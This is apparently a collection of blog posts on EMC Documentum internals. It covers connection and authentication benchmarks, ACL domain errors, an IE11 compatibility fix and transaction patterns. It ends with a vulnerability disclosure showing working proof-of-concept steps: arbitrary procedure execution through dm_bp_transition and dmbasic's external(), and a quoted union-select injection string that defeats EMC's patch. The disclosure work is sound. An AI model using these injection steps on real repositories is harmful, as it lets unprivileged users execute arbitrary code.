Session management. Beginning

It is worth reading about the probability density function before continuing with this post.

One of my skypemates is worried about the following performance problem. His team developed an integration between a customer application and EMC Documentum. Initially the integration used DFS, but because of performance issues they switched to pure DFC. Later they had to upgrade to the latest supported DFC version, and after that the customer started complaining about performance. My skypemate attributes these complaints to changes made in the latest versions of DFC (ISM), but I am very skeptical about his suspicions: in my opinion any upgrade is a stress for a production environment, and any upgrade gives the customer a reason to complain. This is the nature of any customer: bringing up old issues right after something has changed in production always sounds like a brilliant idea.

Though I do not share my skypemate's opinion, his suspicions gave me the idea to write a series of posts about session management in DFC. But before discussing aspects of the DFC implementation we need to perform some basic measurements of typical DFC operations, otherwise we will not be able to understand which operations are relatively fast and which are slow. To perform these measurements I designed a series of microbenchmarks. There are about a dozen of them, but currently we are interested in only four: connection, authentication, object creation, and fetch.

Benchmark methodology

The main benchmark class (tel.panfilov.documentum.benchmark.Benchmark) spawns a given number of threads. Each thread performs a certain operation in a loop and increments a global counter upon successful completion of the operation. The main thread reads the global counter at fixed time intervals and prints the difference from the previous value to standard output. Here I assume that all such measurements are independent. The diagrams shown below were created with the following parameters:

  1. number of concurrent threads = 1
  2. number of measurements = 1000
  3. sleep time between measurements in milliseconds = 10000

For example:

java tel.panfilov.documentum.benchmark.Benchmark ssc_dev dmadmin dmadmin \
> tel.panfilov.documentum.benchmark.impl.Connection 1 1000
Executions per 10000ms: 2, iteration: 1
Executions per 10000ms: 3, iteration: 2
Executions per 10000ms: 4, iteration: 3
Executions per 10000ms: 3, iteration: 4

...

Executions per 10000ms: 3, iteration: 998
Executions per 10000ms: 2, iteration: 999
Executions per 10000ms: 3, iteration: 1000
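
The methodology described above can be sketched in a few lines of Python. This is only a minimal sketch under stated assumptions, not the actual tel.panfilov.documentum.benchmark.Benchmark class: run_benchmark, its parameter names and the stand-in operation are hypothetical, and the operation is an ordinary callable rather than a real DFC call.

```python
import threading
import time


def run_benchmark(operation, threads=1, measurements=5, interval=0.1):
    """Run `operation` in a loop on worker threads and sample a shared counter.

    Returns the number of successfully completed operations per interval.
    All names are hypothetical; this is not the Java benchmark itself.
    """
    counter = 0
    lock = threading.Lock()
    stop = threading.Event()

    def worker():
        nonlocal counter
        while not stop.is_set():
            try:
                operation()
            except Exception:
                continue  # only successful completions are counted
            with lock:
                counter += 1

    workers = [threading.Thread(target=worker, daemon=True) for _ in range(threads)]
    for w in workers:
        w.start()

    samples = []
    previous = 0
    for _ in range(measurements):
        time.sleep(interval)
        with lock:
            current = counter
        samples.append(current - previous)  # difference from the previous reading
        previous = current

    stop.set()
    for w in workers:
        w.join()
    return samples


if __name__ == "__main__":
    # stand-in operation: sleeps about 10 ms instead of opening a Documentum session
    for i, n in enumerate(run_benchmark(lambda: time.sleep(0.01)), start=1):
        print("Executions per %dms: %d, iteration: %d" % (100, n, i))
```

Each sample is one independent observation of "operations per interval", which is what the diagrams summarize.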

Connection and authentication benchmarks

The Connection benchmark was designed not to leverage session pooling, because I wanted to understand how slowly the Documentum stack performs connection handshaking. The result is extremely poor, 6-8 connections per second:

Because authentication is a part of connection handshaking, I designed the Authentication benchmark to understand how slowly Documentum performs authentication. The result for a user with an inline password is 30-40 successful authentications per second (unix authentication is 4 times slower, and I suppose that LDAP authentication is slower still):

Compare these results with Oracle database (OracleJDBC benchmark):

Why do the connection and authentication benchmarks demonstrate such poor performance?

Connection handshaking

When a DFC client tries to establish a new connection with Content Server, it performs the following sequence of actions:

  1. establishes a TCP connection with Content Server (after the TCP handshake Content Server spawns a new process/thread, which establishes a connection with the underlying database)
  2. sends “new session” RPC
  3. requests list of available RPC commands by sending “ENTRY_POINTS” RPC command
  4. sends “AUTHENTICATE_USER” RPC command
  5. sends “GET_ERRORS” RPC command
  6. receives available messages from content server

Actually, the algorithm described above has the following performance gaps:

  1. it would be a good idea to maintain several spare or idle server processes/threads, which stand ready to serve incoming requests
  2. there is no reason to request entry points on every “connection” request: entry points should be cached on the client side
  3. there is no reason to request messages from the server by sending the “GET_ERRORS” RPC command: actually this step is initiated by Content Server, which sets extra flags in the response to the “AUTHENTICATE_USER” RPC command:
    [dmadmin@docu70dev01 ~]$ iapi
    Please enter a docbase name (docubase): ssc_dev
    Please enter a user (dmadmin):
    Please enter password for dmadmin:
    
    
    
            EMC Documentum iapi - Interactive API interface
            (c) Copyright EMC Corp., 1992 - 2012
            All rights reserved.
            Client Library Release 7.0.0130.0537
    
    
    Connecting to Server using docbase ssc_dev
    // receiving of this message is initiated by CS
    [DM_SESSION_I_SESSION_START]info:  "Session 0101ffd78010db5e started for user dmadmin."
    
    
    Connected to Documentum Server running Release 7.0.0140.0644  Linux.Oracle
    Session id is s0
    API>
    

Furthermore, Content Server does not cache the user’s credentials after successful authentication, so every time authentication is performed Content Server “honestly” checks the user’s credentials again. So the result is “predictable”. To confirm my suspicions about the suboptimal connection handshaking algorithm, I hacked my dctmpy library to measure how fast it performs only the first and second steps of connection handshaking (and the disconnect as well) and got the expected result: about 25 connections per second, i.e. a 3 times improvement:

[dmadmin@docu67dev02 ~]$ cat > test1.py
# coding=utf-8

from timeit import timeit


def main():
    setup = """\
from dctmpy.docbaseclient import DocbaseClient
session = DocbaseClient(
    host="192.168.2.56",
    port=12000,
    docbaseid=131031
)
entrypoints = session.entrypoints
session.disconnect()
    """

    stmt = """\
session = DocbaseClient(
    host="192.168.2.56",
    port=12000,
    entrypoints=entrypoints,
    docbaseid=131031
)
session.disconnect()
    """

    A = timeit(setup=setup, stmt=stmt, number=1000)
    print("%15s %6.2fs" % ("Python", A))


if __name__ == '__main__':
    main()
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  39.08s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  36.94s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  40.12s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  39.45s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  36.24s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  37.98s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  42.81s
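
Each run above times 1000 connect/disconnect cycles, so the throughput follows directly from the timings. The arithmetic, using the seven timings from the listing (the variable names are only illustrative):

```python
# Wall-clock times (seconds) reported by test1.py for 1000 connect/disconnect cycles
timings = [39.08, 36.94, 40.12, 39.45, 36.24, 37.98, 42.81]
cycles = 1000

mean_time = sum(timings) / len(timings)
throughput = cycles / mean_time  # connections per second

print("mean time: %.2fs" % mean_time)
print("throughput: %.1f connections per second" % throughput)
# compare with the 6-8 connections per second measured through DFC
print("speed-up: %.1fx to %.1fx" % (throughput / 8, throughput / 6))
```

The mean is about 38.95 seconds, which gives roughly 25.7 connections per second, somewhere between 3 and 4 times the DFC figure.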

Object creation and fetch

The results for these two benchmarks are disappointing too: I would expect them to be at least 10 times better.

About 20 sysobject creations per second:

About 80-100 fetches per second:

Another way to implement “controlled” database lock

The problem:

We are performing a lot of changes in a transaction and want to prevent the transaction from being aborted due to VERSION MISMATCH errors, so we need to put a row-level lock on the objects to be modified. But we do not want to wait for a long time, because our transaction locks objects too (see some explanation in: Pessimistic locking, Pessimistic locking. Advanced approach.)


XCP2 vs ACLs

Yesterday another skypemate of mine asked me whether I knew anything about the following XCP error:

An error occurred while performing the requested operation. Please try again.

  Details 
    Error in operation Object create failure type=jorm1_nomupis

Error code: E_ECM_OPERATION_ERROR
[DM_SYSOBJECT_E_INVALID_ACL_DOMAIN]error: 
    "The <object_type> '<object_name>' is given an invalid ACL domain 'dmadmin'."

EMC published a ridiculous solution for this error; fortunately I knew its root cause. There are three cases:

user’s ACL:

API> retrieve,c,dm_acl where owner_name=USER
...
4501fd088003ad00
API> get,c,l,object_name
...
dm_4501fd088003ad00
API> create,c,dm_document
...
0901fd0880792c3e
API> set,c,l,acl_name
SET> dm_4501fd088003ad00
...
OK
API> set,c,l,acl_domain
SET> test01
...
OK
API> save,c,l
...
OK

repository owner’s ACL:

API> retrieve,c,dm_acl where owner_name='ssc_dev'
...
4501fd088002ec25
API> get,c,l,object_name
...
sample_acl
API> create,c,dm_document
...
0901fd0880792c3d
API> set,c,l,acl_name
SET> sample_acl
...
OK
API> set,c,l,acl_domain
SET> dm_dbo
...
OK
API> save,c,l
...
OK

foreign ACL:

API> retrieve,c,dm_acl where owner_name='dmadmin'
...
4501fd088000020a
API> get,c,l,object_name
...
dm_4501fd088000020a
API> create,c,dm_document
...
0901fd0880792c3c
API> set,c,l,acl_name
SET> dm_4501fd088000020a
...
OK
API> set,c,l,acl_domain
SET> dmadmin
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_INVALID_ACL_DOMAIN]error:  
   "The dm_document '' is given an invalid ACL domain 'dmadmin'."

Documentation (Fundamentals guide; a bit confusing, but the previous listings make it clear):

  • Public ACLs are available for use by any user in the repository. Public ACLs created by the repository owner are called system ACLs. System ACLs can only be managed by the repository owner. Other public ACLs can be managed by their owners or a user with Sysadmin or Superuser privileges.
  • Private ACLs are created and owned by a user other than the repository owner. However, unlike public ACLs, private ACLs are available for use only by their owners, and only their owners or a superuser can manage them.
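
Put together, the three listings and the documentation suggest a simple rule: an object may reference an ACL whose domain is either the current user or the repository owner, and anyone else's private ACL is rejected. Below is a minimal sketch of that rule. It is an interpretation of the listings, not Content Server code: the function and parameter names are hypothetical, the session user in the listings is assumed to be test01, and superuser privileges are ignored.

```python
def acl_domain_allowed(acl_domain, current_user, repository_owner):
    """Return True if an object saved by `current_user` may reference an ACL
    whose domain is `acl_domain`.

    Hypothetical helper modelling the three cases above; the alias dm_dbo
    stands for the repository owner.
    """
    if acl_domain == "dm_dbo":
        acl_domain = repository_owner
    return acl_domain in (current_user, repository_owner)


# the three cases from the listings (session user assumed to be test01)
print(acl_domain_allowed("test01", "test01", "ssc_dev"))   # user's own ACL: True
print(acl_domain_allowed("dm_dbo", "test01", "ssc_dev"))   # repository owner's ACL: True
print(acl_domain_allowed("dmadmin", "test01", "ssc_dev"))  # foreign ACL: False
```

Under this reading, an object that inherits a folder ACL owned by some other user ends up in the third case, which matches the DM_SYSOBJECT_E_INVALID_ACL_DOMAIN error.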

The problem was that by default XCP objects inherit ACLs from the target folder:

and somebody decided to grant additional permissions on the folder. It is strange that XCP does not have any foolproofing here.

D2-Config vs IE11

In spite of the fact that D2 is of no practical interest to me (it has a good collection of anti-patterns though), yesterday one of my skypemates asked me how to make D2-Config work in IE11. The problem is that EMC added http-equiv attributes to D2 pages but forgot about D2-Config, so D2-Config does not work in IE11.

I know three options to resolve this issue:

  1. If you use Apache httpd as a reverse proxy, it is enough to add Header set X-UA-Compatible "IE=EmulateIE7" to httpd.conf
  2. You can achieve the same on application server side using urlrewritefilter, something like:
    web.xml:
    <filter>
        <filter-name>UrlRewriteFilter</filter-name>
        <filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>UrlRewriteFilter</filter-name>
        <url-pattern>/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
        <dispatcher>FORWARD</dispatcher>
    </filter-mapping>
    
    urlrewrite.xml:
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE urlrewrite PUBLIC "-//tuckey.org//DTD UrlRewrite 4.0//EN" 
          "http://www.tuckey.org/res/dtds/urlrewrite4.0.dtd">
    <urlrewrite>
        <rule>
            <set type="response-header" name="X-UA-Compatible">IE=EmulateIE7</set>
        </rule>
    </urlrewrite>
    
  3. And finally, you can code your own filter:
    import javax.servlet.*;
    import javax.servlet.http.HttpServletResponse;
    import java.io.IOException;
    
    public class IEFilter implements Filter {
    
        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) 
                throws IOException, ServletException {
            HttpServletResponse res = (HttpServletResponse) response;
            res.addHeader("X-UA-Compatible", "IE=EmulateIE7");
            chain.doFilter(request, response);
        }
    
        @Override
        public void destroy() {
        
        }
    
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
        
        }
        
    }

I fixed it!

I’ve got bad news for the inhabitants of EMC Support Portal: today CERT disclosed a bunch of security vulnerabilities present in EMC Documentum products. The most interesting thing here is that CERT’s list primarily contains vulnerabilities previously announced by EMC as remediated. The list of contested CVEs is: CVE-2014-2518, CVE-2014-2514, CVE-2014-2507, CVE-2014-2513, CVE-2014-4618, CVE-2014-4626, CVE-2014-2515, CVE-2014-2504, CVE-2014-4629

I perceive the world: request.getRequestURI()

In Webtop 6.7SP2P05 EMC made some weird changes:

these changes completely remove the usefulness of the “componentlist” component:

after clicking on any component:

Initially I thought that this was a new security feature, but webtop configuration files should not contain any environment-sensitive information, otherwise webtop deployment turns into a mess. After some research I found that webtop performs the check in the following way:

HttpServletRequest request;
HttpServletResponse response;
// these regexps come from web.xml
Pattern staticPages = Pattern.compile(
        "(\\.bmp|\\.css|\\.htm|\\.html|\\.gif|\\.jar|\\.jpeg|\\.jpg|\\.js|\\.properties|\\.xml|\\.png)$",
        Pattern.CASE_INSENSITIVE);
Pattern configs = Pattern.compile("/app\\.xml|/config/.*\\.xml", Pattern.CASE_INSENSITIVE);
if (staticPages.matcher(request.getRequestURI()).find()) {
    if (configs.matcher(request.getRequestURI()).find()) {
        response.sendError(HttpServletResponse.SC_UNAUTHORIZED, 
                "The URL is unauthorized in WDK");
    }
}

What does the getRequestURI() method return? Documentation:

Actually, this part of the documentation is not clear, and RFC 1808 comes to the rescue:

RFC 1808           Relative Uniform Resource Locators          June 1995


      <scheme>://<net_loc>/<path>;<params>?<query>#<fragment>

   each of which, except <scheme>, may be absent from a particular URL.
   These components are defined as follows (a complete BNF is provided
   in Section 2.2):

      scheme ":"   ::= scheme name, as per Section 2.1 of RFC 1738 [2].

      "//" net_loc ::= network location and login information, as per
                       Section 3.1 of RFC 1738 [2].

      "/" path     ::= URL path, as per Section 3.1 of RFC 1738 [2].

      ";" params   ::= object parameters (e.g., ";type=a" as in
                       Section 3.2.2 of RFC 1738 [2]).

      "?" query    ::= query information, as per Section 3.3 of
                       RFC 1738 [2].

      "#" fragment ::= fragment identifier.

Now:
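
The effect of the ";params" component on the check can be reproduced outside of webtop. The sketch below ports the two regular expressions to Python and applies them to two hypothetical URIs. It assumes that the servlet container leaves path parameters in the value returned by getRequestURI(); whether the container then serves the file for such a URI is not shown here. The function name is_blocked is also an assumption.

```python
import re

# the same two expressions as in the Java fragment above
STATIC_PAGES = re.compile(
    r"(\.bmp|\.css|\.htm|\.html|\.gif|\.jar|\.jpeg|\.jpg|\.js|\.properties|\.xml|\.png)$",
    re.IGNORECASE)
CONFIGS = re.compile(r"/app\.xml|/config/.*\.xml", re.IGNORECASE)


def is_blocked(request_uri):
    """Mirror of the nested check: blocked only if both patterns are found."""
    return bool(STATIC_PAGES.search(request_uri) and CONFIGS.search(request_uri))


# hypothetical URIs, for illustration only
print(is_blocked("/webtop/wdk/app.xml"))      # True
print(is_blocked("/webtop/wdk/app.xml;a=b"))  # False: ";a=b" defeats the "$" anchor
```

The first pattern is anchored to the end of the string, so anything appended after the file extension makes the outer condition false and the inner check is never reached.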

Q&A. II

Two days ago I received a bunch of questions related to Documentum products:

Comment: Great Blog !!

Few random questions

  1. Are D2 methods implementing ID2Method, and using session passed in execute method by default under transaction? I have seen transaction errors if an exception is thrown inside it by custom code. What if we start our own transaction?
  2. What exactly is D2Session.initTBO(session);? When to use and when not to use it?
  3. Best practice or approach around xPlore you found typically for non indexed document or cause of failure? Some of the xPlore admin reports are good, but for finding cause of each document non searchable, there may be different reason. Any easy way to diagnose that? Also lots of initial documents were migrated and hence there was a batch queue item and not single
  4. Can dynamic groups be used with D2?

Just posting a few which came up in my head right now 🙂

– Anurag

And So …

Q:

Are D2 methods implementing ID2Method, and using session passed in execute method by default under transaction? I have seen transaction errors if an exception is thrown inside it by custom code. What if we start our own transaction?

A:

The behaviour is controlled by the -transaction method argument. If this argument is absent, job methods are executed in a transaction and other methods are not. If you see transaction-related errors like:

  • Transaction is already active
  • Transaction is not active
  • Transaction invalid due to errors, please abort transaction
  • Session disconnected with an unfinished transaction

this means that somebody is not working with transactions properly. The only correct transaction usage pattern is:

// the rule of thumb is perform begin/commit/abort in the same scope, to
// support nesting we check whether transaction is already active or not
boolean txStartsHere = false;
try {
    // if transaction is already active we mustn't try to
    // begin/commit/abort transaction in our code because we don't
    // control transaction
    if (!session.isTransactionActive()) {
        session.beginTrans();
        txStartsHere = true;
    }

    // business logic here

    // transaction is controlled by our code
    if (txStartsHere) {
        session.commitTrans();
        txStartsHere = false;
    }
} finally {
    // transaction is controlled by our code, commitTrans can throw
    // exception but DFC forcibly aborts
    // transaction in this case, so we need to check transaction state
    if (txStartsHere && session.isTransactionActive()) {
        session.abortTrans();
    }
}

All other patterns are wrong (the weird thing is that the above pattern is mentioned in the DFC development guide, but it seems EMC developers don’t read the documentation). For example, the XCP2 antipattern (DataTypeAspectUtils.xcpSave):

boolean transactionStarted = Utils
        .createTransactionIfNotActive(session);
try {
    
    // business logic
    
    if (transactionStarted) {
        session.commitTrans();
    }
} catch (Exception e) {
    Utils.handleRollbackIfReqd(session, transactionStarted);
    Utils.ThrowDfcException(e);
} finally {
    // another logic
}

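Here the XCP developers overlook a whole class of throwables: catch (Exception e) does not catch java.lang.Error and its subclasses, so in that case the rollback handler never runs.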
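
The difference between the two patterns can be illustrated with a small Python analogy. Python is used here only for brevity; FakeSession and both functions are hypothetical stand-ins, not DFC or XCP code. In Java, catch (Exception e) does not see java.lang.Error; the closest Python counterpart is except Exception, which does not see BaseException subclasses such as KeyboardInterrupt.

```python
class FakeSession:
    """Hypothetical stand-in for a DFC session; tracks transaction state only."""

    def __init__(self):
        self.active = False

    def begin(self):
        self.active = True

    def commit(self):
        self.active = False

    def abort(self):
        self.active = False


def catch_based(session, logic):
    # analogue of the XCP pattern: rollback lives in an "except Exception" handler
    session.begin()
    try:
        logic()
        session.commit()
    except Exception:
        session.abort()
        raise


def finally_based(session, logic):
    # analogue of the recommended pattern: rollback lives in "finally"
    started = False
    try:
        if not session.active:
            session.begin()
            started = True
        logic()
        if started:
            session.commit()
            started = False
    finally:
        if started and session.active:
            session.abort()


def failing_logic():
    raise KeyboardInterrupt()  # not an Exception subclass


for pattern in (catch_based, finally_based):
    session = FakeSession()
    try:
        pattern(session, failing_logic)
    except BaseException:
        pass
    print(pattern.__name__, "left transaction open:", session.active)
```

In this sketch only the finally-based variant closes the transaction when the failure is not an ordinary exception.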

Q:

What exactly is D2Session.initTBO(session);? When to use and when not to use it?

A:

When DFC tries to find the implementation class associated with a TBO/Aspect/SBO/Module, it performs lookups in an order that depends on the module type:

SBO lookup order:

  1. IntrinsicModuleRegistry (hardcoded modules in com.documentum.fc.client.impl.bof.registry.IntrinsicModuleRegistry)
  2. Global Registry Repository (you can set up precedence for specific DFC and JVM versions by specifying dmc_module.min_dfc_version and dmc_jar.min_vm_version)
  3. dbor.properties

TBO lookup order:

  1. Session repository
  2. dbor.properties
  3. IntrinsicModuleRegistry

Aspect lookup order:

  1. IntrinsicModuleRegistry
  2. Session repository

all other modules lookup order:

  1. IntrinsicModuleRegistry
  2. Session repository
  3. dbor.properties
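
The lookup orders listed above amount to a "first source that knows the name wins" search. A minimal sketch of that idea follows. It is not DFC code: the resolve function, the registries dictionary and the com.example class names are hypothetical, and real registries are of course not in-memory dictionaries.

```python
# lookup order per module type, as listed above
LOOKUP_ORDER = {
    "SBO": ["IntrinsicModuleRegistry", "Global Registry Repository", "dbor.properties"],
    "TBO": ["Session repository", "dbor.properties", "IntrinsicModuleRegistry"],
    "Aspect": ["IntrinsicModuleRegistry", "Session repository"],
}
DEFAULT_ORDER = ["IntrinsicModuleRegistry", "Session repository", "dbor.properties"]


def resolve(module_type, name, registries):
    """Return (source, class_name) from the first source that knows `name`.

    `registries` maps a source name to a {module name: class name} dict;
    it is a hypothetical in-memory stand-in for the real registries.
    """
    for source in LOOKUP_ORDER.get(module_type, DEFAULT_ORDER):
        class_name = registries.get(source, {}).get(name)
        if class_name is not None:
            return source, class_name
    return None


registries = {
    "Session repository": {"my_type": "com.example.RepoImpl"},
    "IntrinsicModuleRegistry": {"my_type": "com.example.IntrinsicImpl"},
}
print(resolve("TBO", "my_type", registries))     # found in the session repository
print(resolve("Aspect", "my_type", registries))  # found in IntrinsicModuleRegistry
```

The same name can therefore resolve to different classes depending on the module type, because the sources are consulted in a different order.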

D2Session.initTBO(session) registers D2’s BO implementation classes by manipulating IntrinsicModuleRegistry through the reflection API (it does something like IntrinsicModuleRegistry.getInstance().registerTBO(String name, String className)). It is not clear to me why D2 is still not deployed as BOFv2. So, if you are going to work with D2’s objects, you need to call D2Session.initTBO(session).

Q:

Best practice or approach around xPlore you found typically for non indexed document or cause of failure? Some of the xPlore admin reports are good, but for finding cause of each document non searchable, there may be different reason. Any easy way to diagnose that? Also lots of initial documents were migrated and hence there was a batch queue item and not single

A:

I have tried to play with xPlore a couple of times, and I would say that the behaviour you describe is common to every xPlore installation: it is just not intended for use in production. The only best practice here is to escalate problems to support.

Q:

Can dynamic groups be used with D2?

A:

Dynamic groups are primarily a CS and DFC feature. The answer to your question depends on whether D2 has customization points or not; for example, I don’t know how to implement this approach in XCP or D2.

What makes api/dmbasic suck

A year ago I discovered a design gap in Documentum lifecycles. A user is required to have certain permissions on both the document and the dm_policy object to be able to promote a document or attach a lifecycle to it:

However, all the lifecycle logic boils down to executing either the dm_bp_transition or the dm_bp_transition_java docbase method, so any user is able to change the lifecycle state of any document by executing the docbase method directly. Actually, the problem is more serious, because the dm_bp_transition docbase method is insecure by design: it accepts identifiers of “external” procedures and executes anything that is written there:

'------------------------------------------------------------
Sub BP_Transition(_

...

    userEntryID$,_
    actionID$,_
    userActionID$,_

...

  'Evaluate the user-defined entry criteria
  If (result = True And run_entry = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Run user defined entry criteria."
    End If
    result = RunProcedure(userEntryID, 1, sess, sysID,_
                          user_name, targetState)
  End If

...

  If (procID <> "0000000000000000") Then
    result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
    result = external(procID)
    If (result = True) Then
      If (procNo = 1) Then
        ' --- Running user-defined entry criteria ---
        result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
        On Error Goto NoFunction
        result = EntryCriteria(sessID, objID, userName,_
                               targetState, errorStack)

...

A clear example:

 ~]$ cat external.ebs
Function EntryCriteria() as Boolean
   print "Hello, world!"
   EntryCriteria = True
End Function
 ~]$ cat test.ebs
Sub Test(procedureId$)
  Dim result as Boolean
  sess = dmAPIGet("connect,ssc_dev,dmadmin,dmadmin")
  result = external(procedureId$)
  result = EntryCriteria()
End Sub

 ~]$ iapi ssc_dev -Udmadmin -Pdmadmin
Session id is s0
API> create,c,dm_procedure
...
0801ffd7804368e6
API> setfile,c,l,external.ebs,crtext
...
OK
API> save,c,l
...
OK
API> exit
Bye

 ~]$ dmbasic -f test.ebs -eTest -- 0801ffd7804368e6
Hello, world!
 ~]$ 

I think it’s obvious that a correct security fix must do the following:

  • Restrict access to dm_bp_transition and dm_bp_transition_java methods
  • Check input parameters of dm_bp_transition method (identifiers of procedures to execute are stored in dm_policy object)

Unfortunately, this is not obvious to EMC (or it is too hard to implement basic checks in dmbasic): they decided that the root cause of the security vulnerability is the fact that any user is able to create dm_procedure objects (yeah, every man is a potential rapist – let’s cut off penises), and now we have:

API> create,c,dm_procedure
...
0801ffd780436937
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:  
  "The current user (test02) needs to have superuser or sysadmin privilege."

Unfortunately, the external() function in dmbasic accepts not only dm_procedure objects but any dm_sysobject:

API> create,c,dm_document
...
0901ffd780436944
API> setfile,c,l,external.ebs,crtext
...
OK
API> save,c,l
...
OK
API> Bye
 ~]$ dmbasic -f test.ebs -eTest -- 0901ffd780436944
Hello, world!

What did EMC do about that? They decided that it is a good idea to load only dm_procedure objects in dmbasic’s external() function:

~]$ strings dmbasic | grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
 ~]$ cat test.ebs
Sub Test(procedureId$)
  Dim result as Boolean
  sess = dmAPIGet("connect,ssc_dev,dmadmin,dmadmin")
  result = external(procedureId$)
  print dmAPIGet("getmessage,c")
  result = EntryCriteria()
End Sub
 ~]$ dmbasic -f test.ebs -eTest -- 0901ffd780436944
[DM_API_W_NO_MATCH]warning:  "There was no match in the docbase for the qualification: 
   dm_procedure where r_object_id = '0901ffd780436944'"

dmbasic: Error 35 in line 6: Sub or Function not defined
 ~]$

Does it look good? Actually, no. I have no idea who invented such a ridiculous way to call Documentum RPCs through dmAPIGet/dmAPIExec commands, but concatenating a command and its arguments into a single string and then parsing that string is a bad idea. Take a look at this API magic:

Session id is s0
API> id,c,dm_procedure where r_object_id='0901ffd780436944,' 
   union select r_object_id from dm_sysobject where r_object_id='0901ffd780436944'
...
0901ffd780436944
API> fetch,c,0901ffd780436944,' union select r_object_id 
   from dm_sysobject where r_object_id='0901ffd780436944
...
OK

Now:

 ~]$ dmbasic -f test.ebs -eTest -- "0901ffd780436944,' union \
> select r_object_id from dm_sysobject where r_object_id='0901ffd780436944"

Hello, world!
 ~]$
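
The mechanics of the trick can be reproduced with plain string formatting. The sketch below is only an illustration under stated assumptions: the format string is the one found in the dmbasic binary, but how dmbasic actually builds and parses its commands is not known here, the helper name build_id_command is hypothetical, and the 16-hex-digit check is an assumed shape for object identifiers based on the ones shown in this post.

```python
import re

# format string found in the dmbasic binary (see the strings output above)
ID_COMMAND = "id,%s,dm_procedure where r_object_id = '%s'"

# assumed shape of an object identifier: 16 lowercase hex digits
OBJECT_ID = re.compile(r"[0-9a-f]{16}")


def build_id_command(session, procedure_id, validate=False):
    """Build the API command string; optionally reject malformed identifiers."""
    if validate and not OBJECT_ID.fullmatch(procedure_id):
        raise ValueError("not an object id: %r" % procedure_id)
    return ID_COMMAND % (session, procedure_id)


doc_id = "0901ffd780436944"
payload = doc_id + ",' union select r_object_id from dm_sysobject where r_object_id='" + doc_id

# without validation the payload becomes part of the qualification
print(build_id_command("c", payload))

# a command that splits its arguments on commas sees only the part before the comma
print(("fetch,c,%s" % payload).split(",")[2])

# with validation the payload is rejected before any command is built
try:
    build_id_command("c", payload, validate=True)
except ValueError as e:
    print("rejected:", e)
```

Checking the identifier before it is concatenated into the command string is the kind of basic input check that the fix described above does not perform.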